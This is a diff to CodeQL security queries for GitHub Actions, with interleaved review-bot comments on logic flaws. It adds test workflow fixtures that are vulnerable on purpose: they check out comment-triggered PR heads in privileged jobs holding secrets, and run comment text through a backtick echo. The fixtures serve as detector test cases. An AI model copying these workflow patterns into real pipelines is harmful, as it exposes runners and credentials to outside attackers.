+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(),
+ ["untrusted-checkout", "artifact-poisoning"])
+ ) and
 (
 sink.getNode() instanceof OutputClobberingFromFileReadSink or
 sink.getNode() instanceof WorkflowCommandClobberingFromFileReadSink or
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
index 4ff86eb0fbde..9fa066d195ce 100644
--- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
+++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql
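Review bot: `ControlCheck.protects` declares its first parameter as `Step`, but the new conjuncts pass `sink.getNode().asExpr()`; unless expression nodes are also `Step` values in this AST, `protects` has no result for them, the `not exists(...)` is vacuously true and the new guard never suppresses anything, whereas the checkout queries later in the commit pass a real `Step` (`checkout`). The diffstat changes no `.expected` file under CWE-074, CWE-077, CWE-088 or CWE-094, so nothing in the commit demonstrates the guard firing; a fixture with an association check placed before the clobbering step would settle it, and if the intent is the step containing the expression, that step is what should be passed (the hunk already navigates from the expression to its job, so a step-level accessor presumably exists). The same block is copy-pasted into EnvPathInjectionCritical, EnvVarInjectionCritical, ArgumentInjectionCritical and CodeInjectionCritical below; a helper in ControlChecks.qll such as `predicate isProtected(Step step, Job j, string category)` would keep the five in step. The `where` clause starts before the hunk.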
@@ -15,15 +15,27 @@ import actions
 import codeql.actions.security.EnvPathInjectionQuery
 import EnvPathInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
 where
 EnvPathInjectionFlow::flowPath(source, sink) and
 inPrivilegedContext(sink.getNode().asExpr()) and
 (
- not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection")
+ )
 or
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(),
+ ["untrusted-checkout", "artifact-poisoning"])
+ ) and
 sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 select sink.getNode(), source, sink,
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
index 89e1ddd3cc2d..806bae2a91d2 100644
--- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
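Review bot: The non-artifact branch suppresses on `"code-injection"` although ControlChecks.qll now defines an `"envpath-injection"` category for exactly this query; today every check maps all non-TOCTOU categories identically, so results are unchanged, but as soon as one check is tuned per category this query would follow the wrong one. Suggest `source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envpath-injection")` here, and likewise `"output-clobbering"` in OutputClobberingHigh above (EnvVarInjectionCritical below already uses its own category for the outer guard). The enclosing `where` clause starts before the hunk.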
@@ -16,16 +16,33 @@ import actions
 import codeql.actions.security.EnvVarInjectionQuery
 import codeql.actions.dataflow.ExternalFlow
 import EnvVarInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink
 where
 EnvVarInjectionFlow::flowPath(source, sink) and
 inPrivilegedContext(sink.getNode().asExpr()) and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection")
+ ) and
 // exclude paths to file read sinks from non-artifact sources
 (
- not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection")
+ )
 or
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(),
+ ["untrusted-checkout", "artifact-poisoning"])
+ ) and
 (
 sink.getNode() instanceof EnvVarInjectionFromFileReadSink or
 madSink(sink.getNode(), "envvar-injection")
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
index affa372f14eb..6f1f6008a062 100644
--- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
+++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql
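Review bot: The query now applies two suppressions to the same sink: `"envvar-injection"` for every path, and `"code-injection"` again for non-artifact sources; with the `protectsCategoryAndEvent` bodies in this commit both categories are protected by exactly the same checks, so the inner conjunct adds nothing today and leaves a reader wondering what is meant to differ. Either drop the inner `"code-injection"` block or add a comment above it naming the case in which the two categories are expected to diverge, e.g. `// a check may protect env-var injection without protecting code injection; keep both`. The `where` clause continues outside the hunk.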
@@ -14,11 +14,17 @@ import actions
 import codeql.actions.security.ArgumentInjectionQuery
 import ArgumentInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink
 where
 ArgumentInjectionFlow::flowPath(source, sink) and
- inPrivilegedContext(sink.getNode().asExpr())
+ inPrivilegedContext(sink.getNode().asExpr()) and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection")
+ )
 select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, sink.getNode().(ArgumentInjectionSink).getCommand()
diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql
index 9319718b7fc0..ec4925d24a0c 100644
--- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql
+++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql
@@ -17,11 +17,17 @@ import actions
 import codeql.actions.security.CodeInjectionQuery
 import CodeInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink
 where
 CodeInjectionFlow::flowPath(source, sink) and
 inPrivilegedContext(sink.getNode().asExpr()) and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection")
+ ) and
 // exclude cases where the sink is a JS script and the expression uses toJson
 not exists(UsesStep script |
 script.getCallee() = "actions/github-script" and
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
index 685bdcca401f..67b615d115a6 100644
--- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql
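Review bot: In both hunks the event handed to `protects` is `...getEnclosingJob().getATriggerEvent()` evaluated inside `not exists(ControlCheck check | ...)`, so a check that covers any one trigger event suppresses the alert for all of them; a workflow on both `pull_request_target` and `issue_comment` guarded by an association check, which per ControlChecks.qll protects only the former, is reported by neither query even though the comment-triggered path is unguarded. Bind the event once and negate per event, e.g. `exists(Event e | e = source.getNode().asExpr().getEnclosingJob().getATriggerEvent() and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), e, "argument-injection")))`, and the same shape in OutputClobberingHigh, EnvPathInjectionCritical and EnvVarInjectionCritical above. Both `where` clauses continue outside their hunks.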
@@ -26,7 +26,9 @@ where // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + ) and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index ea36bcf0be1c..b6df022329dd 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -57,7 +57,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index ee2719f06112..0750a02930eb 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql 
@@ -34,7 +34,9 @@ where path = source.(UntrustedArtifactDownloadStep).getPath() ) and // the checkout/download is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + not exists(ControlCheck check | + check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a97309ce187b..7c7ab15de319 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -24,11 +24,10 @@ where // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 0a83cc54ad69..7f584e00c9ac 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
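Review bot: In the UntrustedCheckoutTOCTOUCritical hunk, `check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou")` quantifies its two conjuncts differently: the first holds if some trigger event is protected, the negated one only if no trigger event has toctou-grade protection, so a job with two `on:` events may be reported or silenced depending on which event the check happens to cover. Binding a single event makes the intent explicit, e.g. `exists(Event e | e = j.getATriggerEvent() and check.protects(checkout, e, "untrusted-checkout") and not check.protects(checkout, e, "untrusted-checkout-toctou"))`; UntrustedCheckoutTOCTOUHigh on the next line has the same shape. The replaced lines also dropped `check.dominates(checkout)`; presumably `protects` now implies dominance, which is worth confirming, since a check that does not dominate the checkout would otherwise count as protection. With `j.isPrivilegedExternallyTriggerable()` replaced by `inPrivilegedContext(checkout)`, nothing left in the hunk ties `j` to `checkout`'s job, so the binding in the `from`/`where` lines outside the hunk should be checked to still exist.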
@@ -22,11 +22,10 @@ where // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - j.isPrivilegedExternallyTriggerable() and + inPrivilegedContext(checkout) and // the mutable checkout step is protected by an Insufficient access check - check.dominates(checkout) and - check.protects(checkout, j.getATriggerEvent()) and - check.protectsAgainstRefMutationAttacks() = false + check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and + not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 2026a784d055..499abc047b65 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -20,10 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep step where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) -select s, checkout, s, "Execution of untrusted code on a privileged workflow." + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event event | + event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + ) + ) +select step, checkout, step, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 0675603af0f9..8577218800e1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
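Review bot: Both new branches require `event = checkout.getEnclosingJob().getATriggerEvent()` to produce a value, and the UntrustedCheckoutCritical.expected hunk further down removes the `untrusted_checkout3.yml` result whose checkout lives in `.github/actions/dangerous-git-checkout/action.yml`; a step inside a composite action presumably has no enclosing workflow job with trigger events, so the query now silently loses that case. If that drop is not intended, the non-`issue_comment` branch needs a fallback for checkouts without a resolvable trigger event (for example, keep reporting when `not exists(checkout.getEnclosingJob().getATriggerEvent())`); if it is intended, the removed expectation deserves an explanatory comment. Separately, the `issue_comment` branch uses `dominates` rather than `protects(checkout, event, "untrusted-checkout")`, so the event-specific effectiveness that `protects` encodes is not consulted on that path, and the comment does not say why the actor/association/permission check must be paired with a `CommentVsHeadDateCheck`; I would write `// issue_comment: the comment author may differ from whoever pushed the PR head, so an actor/association/permission check only counts together with a check that the head was not pushed after the comment`.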
@@ -23,5 +23,26 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) + inPrivilegedContext(checkout) and + ( + // issue_comment: check for date comparison checks and actor/access control checks + exists(Event e | + e.getName() = "issue_comment" and + checkout.getEnclosingJob().getATriggerEvent() = e and + not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | + (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and + write_check.dominates(checkout) and + data_check.dominates(checkout) + ) + ) + or + // not issue_comment triggered workflows + exists(Event event | + not event.getName() = "issue_comment" and + not exists(ControlCheck check | + check + .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") + ) + ) + ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml new file mode 100644 index 000000000000..16bb6bf876c3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml 
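Review bot: In the second `or` branch, `event` is never tied to the checkout's job: `exists(Event event | not event.getName() = "issue_comment" and not exists(...))` holds for any non-`issue_comment` event anywhere in the database, and the inner `protects` call passes `checkout.getEnclosingJob().getATriggerEvent()` instead of `event`. For a job triggered only by `issue_comment`, this branch can therefore fire whenever some other workflow in the database declares, say, `pull_request`, bypassing the date-check logic of the first branch; the visible `.expected` changes likely do not show this because test11/test12 end in a poisonable step and fall to the Critical query. UntrustedCheckoutCritical in the previous hunk has the intended shape: add `event = checkout.getEnclosingJob().getATriggerEvent() and` to the branch and call `check.protects(checkout, event, "untrusted-checkout")`. Two smaller points: `data_check` here is `date_check` in the Critical query, and this query ignores `PermissionCheck` on the `issue_comment` path while Critical accepts it, so the two queries disagree on whether a permission check counts there.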
@@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml 
@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 000000000000..0a73e86d5fc6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml 
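Review bot: test12.yml differs from test11.yml only by the `author_association` clause in the job `if`, and the visible `.expected` hunks add test11 to UntrustedCheckoutCritical while no test12 line appears, so this fixture is presumably the negative case; nothing in the file records that intent. A leading comment would make the expectation reviewable, e.g. `# Negative case for UntrustedCheckoutCritical: as test11.yml, but the job if-condition requires the PR author to be OWNER/COLLABORATOR/MEMBER (association check) in addition to the comment-vs-push date check.` The same applies to test11.yml and test13.yml on the neighbouring hunks.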
@@ -0,0 +1,31 @@ +on: + issue_comment: + types: + - created +jobs: + danger-for-external: + name: Danger for external - Node.js 16 + if: | + github.event_name == 'issue_comment' && github.event.action == 'created' + && github.event.issue.pull_request != null + && startsWith(github.event.comment.body, '/danger') + runs-on: ubuntu-latest + steps: + - name: Check repository permission for user + uses: sushichop/action-repository-permission@v2 + with: + required-permission: write + reaction-permitted: rocket + comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`... + - name: Clone the PR source + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.issue.number }}/head + fetch-depth: 0 + - uses: actions/setup-node@v3 + with: + node-version: 16 + - name: Danger JS + run: npx danger ci + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c91470d5cc84..5d38b397a428 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -27,4 +27,5 @@ | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7313ffd9ae33..8bb9e02559c8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -175,6 +175,15 @@ edges | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| .github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -223,7 +232,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | 